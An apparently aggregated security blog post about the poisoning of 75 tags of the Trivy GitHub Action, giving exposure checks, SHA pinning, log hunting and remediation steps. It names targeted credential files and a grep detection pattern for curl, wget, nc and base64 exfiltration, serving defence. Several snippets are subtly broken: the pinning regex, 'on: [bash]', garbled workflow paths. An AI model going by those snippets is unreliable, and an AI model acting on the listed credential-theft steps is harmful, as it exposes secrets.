Trivy GitHub Action Backdoored: 75 Tags Poisoned in Massive CI/CD Supply Chain Attack + Video

By /

Listen to this Post

Featured Image

Introduction:

A sophisticated supply-chain attack has compromised the Trivy vulnerability scanner’s GitHub Action, exploiting residual credentials from a prior breach to inject credential-stealing malware directly into CI/CD pipelines. This incident highlights the cascading risk of automated trust in development workflows, where a single compromised action can expose thousands of organizations to post-exploitation data theft.

Learning Objectives:

  • Understand the mechanics of a supply-chain attack targeting CI/CD pipelines via GitHub Actions.
  • Identify indicators of compromise (IOCs) associated with the malicious Trivy-action tags.
  • Implement defensive strategies, including hash pinning and artifact verification, to secure automated workflows.

You Should Know:

  1. The Anatomy of the Trivy-action Supply Chain Attack

The breach leveraged a previously compromised set of credentials to force-push 75 out of 76 version tags in the `aquasecurity/trivy-action` repository. By overwriting historical tags, the attacker effectively transformed trusted version references (e.g., v0.34.0) into a distribution mechanism for a credential-stealing infostealer. Because over 10,000 GitHub workflow files reference this action, any pipeline using an affected tag automatically executed the malicious payload during the scan phase.

Step‑by‑step guide to verifying your exposure:

  • List your repository’s used actions: Search your `.github/workflows/.yml` files for aquasecurity/trivy-action.
  • Check the exact version tag: If your workflow uses @v0.35.0, you are safe. Any other tag from `v0.1.0` to `v0.34.1` or `v0.34.2` to `v0.34.10` (excluding v0.35.0) may be compromised.
  • Review GitHub Actions logs for anomalies: Look for unexpected outbound network connections or processes attempting to read ~/.aws/credentials, ~/.ssh/id_rsa, or environment variables like DOCKER_PASSWORD, GH_TOKEN.

Linux command to audit local workflow files:

grep -rnw .github/workflows/ -e "aquasecurity/trivy-action" -e "trivy-action@v" --color

– `-r` = recursive search
– `-n` = show line numbers
– `-w` = match whole words

Windows PowerShell equivalent:

Select-String -Path .github/workflows/.yml -Pattern "aquasecurity/trivy-action"

2. Mitigating Compromised GitHub Actions with Hash Pinning

The primary defense against tag poisoning is to pin actions to a specific commit hash (SHA) rather than a mutable version tag. GitHub’s documentation recommends this practice to ensure deterministic builds. By referencing the exact immutable SHA, you eliminate the risk of a tag being force-pushed to a malicious state.

Step‑by‑step guide to pinning an action:

  1. Navigate to the action repository (e.g., `https://github.com/aquasecurity/trivy-action`).
  2. Find the commit SHA of the last known safe version (v0.35.0).

3. Replace your workflow’s `uses:` line.

Example unsafe workflow:

- name: Run Trivy vulnerability scanner
uses: aquasecurity/[email protected]

Example safe workflow with hash pinning:

- name: Run Trivy vulnerability scanner
uses: aquasecurity/trivy-action@6f9d5682c6e693d918f7285385bae15b7de09c8c  v0.35.0

Automated detection script (Linux):

 Find all uses of trivy-action not pinned to a full SHA
grep -E "uses: aquasecurity/trivy-action@[^a-f0-9]{40}" .github/workflows/.yml

This command flags any reference that is not a full 40-character hexadecimal SHA.

3. Detecting Credential-Stealing Payloads in CI/CD Logs

The injected infostealer likely exfiltrates secrets by scraping environment variables and common credential files. Security teams should pivot from solely monitoring network egress to analyzing CI/CD runtime artifacts. The payload may attempt to `curl` or `wget` credentials to an external C2 server.

Indicators to monitor:

  • Unexpected outbound connections from GitHub Actions runners to new or suspicious IPs.
  • Processes reading sensitive files in `/home/runner/work` or %USERPROFILE%.
  • Base64-encoded strings in build logs that decode to credential data.

Linux command to scan logs for exfiltration attempts:

grep -E "curl|wget|nc|base64|export.http|POST.http" /path/to/github_actions.log

Windows command to search event logs for unusual process creation:

Get-WinEvent -FilterHashtable @{LogName='Security'; ID=4688} | Where-Object {$<em>.Message -like "wget" -or $</em>.Message -like "curl"}

4. Hardening CI/CD Pipelines Against Future Attacks

Beyond pinning, adopt a multi-layered defense strategy for GitHub Actions. Restrict permissions using the `permissions` block to ensure the workflow only has the minimum necessary rights. Additionally, use environment protection rules and require approval for workflows that access production secrets.

Example workflow with least privilege:

name: Secure CI/CD
on: [bash]
permissions:
contents: read  Only read repo contents, not write
jobs:
scan:
runs-on: ubuntu-latest
steps:
- name: Run Trivy scanner
uses: aquasecurity/trivy-action@6f9d5682c6e693d918f7285385bae15b7de09c8c
with:
scan-type: 'fs'
scan-ref: '.'

Key hardening steps:

  • Rotate compromised credentials: Assume any secret exposed to a compromised workflow is leaked.
  • Enable GitHub’s security alerts for vulnerable actions.
  • Use OpenID Connect (OIDC) instead of long-lived secrets for cloud provider access.

5. Remediating After a Supply Chain Compromise

If your pipeline used an affected tag, treat the pipeline as compromised. Any artifacts, containers, or code built during that period should be considered potentially backdoored. Rebuild from a known-good state and rotate all secrets.

Step‑by‑step remediation:

1. Isolate the compromised runner logs and artifacts.

  1. Rotate all secrets that were present in the environment (AWS keys, GitHub tokens, API keys).
  2. Rebuild all artifacts using a clean pipeline with the safe `v0.35.0` or pinned hash.
  3. Conduct a forensic review of deployment logs to identify if the payload exfiltrated data.
  4. Notify stakeholders if sensitive data may have been exposed.

What Undercode Say:

  • Key Takeaway 1: Tag-based versioning in CI/CD is inherently unsafe; mandatory SHA pinning is the only reliable control against tag poisoning attacks.
  • Key Takeaway 2: The Trivy incident underscores the “blast radius” of supply-chain attacks—a single compromised action can cascade across tens of thousands of organizations, turning trusted developer tools into primary attack vectors. Continuous monitoring of CI/CD logs and behavioral anomalies is no longer optional but essential for post-exploitation detection.

Prediction:

Expect a sharp rise in similar supply-chain attacks targeting popular GitHub Actions and container tools in the coming year. Attackers will increasingly automate the discovery of mutable tags across high-usage repositories, leveraging residual credentials from previous breaches to maintain persistence. Organizations will be forced to adopt software bill of materials (SBOM) for pipelines and enforce strict runtime policies that block actions not pinned by SHA, effectively ending the era of trust-based version tags in CI/CD.

▶️ Related Video (82% Match):

🎯Let’s Practice For Free:

IT/Security Reporter URL:

Reported By: Varshu25 Trivy – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow UndercodeTesting & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin | 🦋BlueSky

Related Posts: